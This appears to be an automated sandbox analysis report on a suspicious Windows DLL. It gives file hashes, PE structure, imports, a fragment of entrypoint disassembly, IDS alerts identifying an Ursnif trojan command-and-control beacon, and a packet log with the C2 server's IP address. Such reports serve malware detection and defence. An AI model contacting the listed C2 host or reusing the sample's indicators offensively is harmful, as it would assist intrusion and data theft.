SHA-256: | F2CBA3B681173F5EE1BDB68573D47FAD179D77177C5C5E442C32026D7A90CB45 |
SHA-512: | F8D24E7054A20979DB289F915DB18789E6821C8A81AB8F2C85BF6B49486BE708C00FF033B50FB9678A9E62C985DD120037B910DE81F8E3D20F2BEEF416B6BBE0 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220504\PowerShell_transcript.210979.BCECBztA.20220504162021.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1363 |
Entropy (8bit): | 5.433411541663804 |
Encrypted: | false |
SSDEEP: | 24:BxSAjCdZOvBdaD0x2DOXUWZnIKLCH0n4qWBHjeTKKjX4CIym1ZJXmnIKLCH0n4V1:BZdv6D0oOFu0n4tBqDYB1Zyu0n4rZZLH |
MD5: | 040FF5A0122C60CC82173288B5940EC1 |
SHA1: | E79E7D8569BDEF39A4F50B144092203F9B3B5F90 |
SHA-256: | 4F50423AB8053BF88FFC57F97BBEF47F0AAB312ECB16BF9BD093D7BE08D54E63 |
SHA-512: | 1F6BC1B9F40103B62B6F9AE379EA5660E3D62BAF5DFB5BA19E606CB0D8F2ED084525881DCDFEA5E2461F826D19B3FC3E54B72F56F4C7253575476041486D87F8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | modified |
Size (bytes): | 218 |
Entropy (8bit): | 5.411852919034256 |
Encrypted: | false |
SSDEEP: | 6:QHkQg1sQXgKf+LgyKBM34H6s83F1tu4r9iyeqmM:QEQSsQXNmLgyaI4HmA4cyeHM |
MD5: | 2868C522991E82B72977CDC6EE833E68 |
SHA1: | 87C92831FDCB279D76109D2D00D9BC50614A3F0C |
SHA-256: | 11CBCC12484EE382F33437D9BE237EDE88C7A6ADFCDC37A77C6A1470F6BDFDE9 |
SHA-512: | 852389C501957E3663D757BCCD181F188D7D6B1CBB9426A6007F1A7BED2AEFD9CB3B224886EABEF9CB0FB64C57795E82511CEDC5678EED1BE4F6343B44029CE9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\explorer.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 838 |
Entropy (8bit): | 3.073236880282747 |
Encrypted: | false |
SSDEEP: | 12:8glVm/3BVSXvk44X3ojsqzKtnWNaVgiNL4t2Y+xIBjK:8p/BHYVKVWiV57aB |
MD5: | CA1C201059C5BFD5900F5EB2466883CC |
SHA1: | BF3670A8C06A4FABC5C410F368E178B353F9166C |
SHA-256: | E5717E89B0D46C5E89F39410FA7A9DE94AA6A3301F8AC920F84F1A7179554085 |
SHA-512: | 2273AF46D41B9698B23AEADD8EFBEF80017CFD465B4347CFB99C2FEAE371F39A511288AA64AAFA2E35DD2AD883D8E43D70A65E62C18977C6C6D85E3153041D4C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.23867837523732 |
TrID: |
|
File name: | qOfIxt1fnQ.dll |
File size: | 442368 |
MD5: | 00d3b863abdafc62d9b49f99aec5955c |
SHA1: | 79d75aa72072ddd75a12e849d27b20cc903b9b01 |
SHA256: | 5298257931fb4fcb64bd0e0ba48a2f1f4f1b501813b27d2aabd82056a4feb957 |
SHA512: | 7ba392ed7b747e7818f949cd65764a52a6c2bd39eb1434f2400c5945a926267484260bd970ca212a375bf3b6cb1ee596eb9ae97ac6e93a4af4ad4354ada86c43 |
SSDEEP: | 6144:ripWDNyexlJJtyhOhevp/D23qAGzjLg8O9YTEqT2uGRp1WgHyo3NldzlQgOsnGWU:ripGFlJqYhiVDwGU8OqaX1WW3zNg7 |
TLSH: | C194F14A77A11DBBEC0807760CF8C51B9B66BE2CA23A70DEA6683CFF7E175511048706 |
File Content Preview: | MZ......................@.......................................<dR.x.<.x.<.x.<.c.....<.uW....<.x.=...<..|....<.{}....<..X?...<.....-.<.{}.._.<..\<...<.Richx.<.PE..L......A...........!.........P......0.............@.................................5...... |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401430 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | 0bedc9af0ed7cf2ba33cf662a24d448e |
Instruction |
---|
push ebp |
mov ebp, esp |
add ecx, FFFFFFFFh |
call 00007F7998A2F1CCh |
pop eax |
pop eax |
mov dword ptr [00414544h], eax |
mov edx, dword ptr [00414660h] |
sub edx, 00005289h |
call edx |
ret |
int3 |
push esi |
mov eax, ebx |
mov dword ptr [00414540h], eax |
pop dword ptr [00414538h] |
mov dword ptr [00414548h], ebp |
mov dword ptr [0041453Ch], edi |
sub dword ptr [00414548h], FFFFFFFCh |
loop 00007F7998A2F175h |
mov dword ptr [ebp+00h], eax |
nop |
mov al, 3Eh |
mov esp, C49C9141h |
xlatb |
jnc 00007F7998A2F182h |
int3 |
mov dword ptr [88C777ACh], eax |
adc ebp, ecx |
test eax, F6469A2Fh |
jnl 00007F7998A2F142h |
adc byte ptr [ebp-69h], cl |
les edx, fword ptr [eax+36h] |
adc cl, byte ptr [edx+0Ah] |
pop edi |
fisub dword ptr [ecx+eax*4+32h] |
inc ebx |
lahf |
add dword ptr [edi-4BCE0FACh], 7BDB895Ah |
dec ebx |
or dword ptr [esi+ebp+4246B7E3h], 0068870Ah |
mov ch, 0Eh |
les edx, fword ptr [ecx+63D22AEBh] |
das |
test al, 8Ah |
add dh, al |
jne 00007F7998A2F1E4h |
movsb |
lds ecx, fword ptr [ebp-38470ACFh] |
in eax, 73h |
and ecx, dword ptr [ebx+eax*4] |
mov ebx, 43A1EE02h |
push FFFFFFDEh |
sbb ebx, dword ptr [ecx] |
push ds |
ffree st(7) |
adc eax, 908E1006h |
call far fword ptr [ebx+33h] |
clc |
adc al, CBh |
pop edi |
mov ch, 82h |
pushad |
adc byte ptr [ebp+0007CE9Ch], dh |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdc18 | 0x8c | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x9f28 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0xf0c | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xd0b0 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0xb0 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0xb710 | 0xc000 | False | 0.0736897786458 | data | 1.02254153445 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0xd000 | 0x1073 | 0x2000 | False | 0.180541992188 | data | 3.71518095672 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0xf000 | 0x79d0 | 0x6000 | False | 0.373819986979 | data | 6.02838684246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.crt | 0x17000 | 0x1dc8e | 0x1e000 | False | 0.988427734375 | data | 7.9815287954 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.erloc | 0x35000 | 0x2ca4f | 0x2d000 | False | 0.988259548611 | data | 7.98122243943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x62000 | 0x9f28 | 0xa000 | False | 0.602783203125 | data | 6.51663069246 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x6c000 | 0x132e | 0x2000 | False | 0.219360351562 | data | 3.73577949218 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x62360 | 0x666 | data | English | United States |
RT_ICON | 0x629c8 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x67228 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x697d0 | 0xea8 | data | English | United States |
RT_ICON | 0x6a678 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x6af20 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x6b488 | 0xb4 | data | English | United States |
RT_DIALOG | 0x6b540 | 0x120 | data | English | United States |
RT_DIALOG | 0x6b660 | 0x158 | data | English | United States |
RT_DIALOG | 0x6b7b8 | 0x202 | data | English | United States |
RT_DIALOG | 0x6b9c0 | 0xf8 | data | English | United States |
RT_DIALOG | 0x6bab8 | 0xa0 | data | English | United States |
RT_DIALOG | 0x6bb58 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x6bc48 | 0x4c | data | English | United States |
RT_VERSION | 0x6bc98 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
KERNEL32.dll | EraseTape, GetDiskFreeSpaceExA, lstrlenA, LocalHandle, GetModuleFileNameA, GetBinaryTypeA, GetThreadLocale, GetFileTime, GlobalFlags, GetStringTypeA, EnumResourceTypesA, GetConsoleCP, GetCommTimeouts, WriteProcessMemory, GlobalMemoryStatus, DebugBreak |
OLEAUT32.dll | GetRecordInfoFromTypeInfo, LoadTypeLibEx |
USER32.dll | DefMDIChildProcW, GetMenuItemRect, MessageBoxIndirectW, DeleteMenu, GetClassNameA, GetMessagePos, GetUpdateRgn, GetClientRect, GetScrollBarInfo |
GDI32.dll | ExtSelectClipRgn, GetBkColor, GetCharWidthFloatA, GetTextMetricsW, GdiComment |
ADVAPI32.dll | EnumServicesStatusExW, InitiateSystemShutdownExW, RegGetValueA |
msvcrt.dll | strcoll, fgetwc, srand |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
05/04/22-16:20:11.489303 05/04/22-16:20:11.489303 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
05/04/22-16:20:12.290322 05/04/22-16:20:12.290322 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
05/04/22-16:19:50.763686 05/04/22-16:19:50.763686 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49768 | 80 | 192.168.2.7 | 13.107.42.16 |
05/04/22-16:20:10.851257 05/04/22-16:20:10.851257 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 4, 2022 16:20:11.162950993 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.162981033 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163001060 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163029909 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163058043 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163079023 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163104057 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163110018 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163186073 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163213015 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163232088 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163259983 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163263083 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163285971 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163289070 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163290024 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163307905 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163332939 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163351059 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163357019 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163362026 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163381100 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163414001 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163419962 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.163858891 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163887978 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163908005 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.163932085 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.164009094 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180193901 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180265903 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180305004 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180351973 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180401087 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180437088 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180532932 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180577040 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180587053 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.180684090 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.180911064 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181236029 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181291103 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181341887 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181391954 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181397915 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181406975 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181442022 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.181493998 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.181549072 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183239937 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183288097 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183320045 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183362961 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183387041 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183635950 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183685064 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183727980 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183743954 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183760881 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183789015 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183790922 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183831930 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.183871984 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.183979034 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184036016 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184040070 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184076071 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184206009 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184222937 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184272051 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184315920 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184336901 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184350967 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184386015 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184422970 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184426069 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184439898 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184515953 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184570074 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184607029 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184645891 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184686899 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184726954 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184768915 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184777975 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184797049 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184806108 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184829950 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184832096 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184873104 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184914112 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184953928 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.184977055 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184993029 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.184994936 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185003042 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185053110 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185096025 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185117960 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185153961 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185157061 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185197115 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185214043 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185256958 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185297966 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185337067 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185349941 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185352087 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185409069 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185420036 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185450077 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185466051 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185508013 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185553074 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185574055 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185594082 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185641050 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185684919 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185695887 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185714960 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.185724974 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.185734987 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.197885036 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.197941065 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.197973967 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198015928 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198055029 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198064089 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198086023 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198088884 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198096037 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198101997 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198136091 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198163033 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198184967 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198189974 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198436022 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198481083 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198535919 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198538065 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198576927 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198580980 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198597908 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198658943 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198699951 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198708057 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198717117 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198756933 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198815107 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198863983 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198875904 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198883057 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198904991 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198942900 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.198951006 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198955059 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.198971033 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199023008 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.199620962 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199667931 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199696064 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.199734926 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.199754953 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
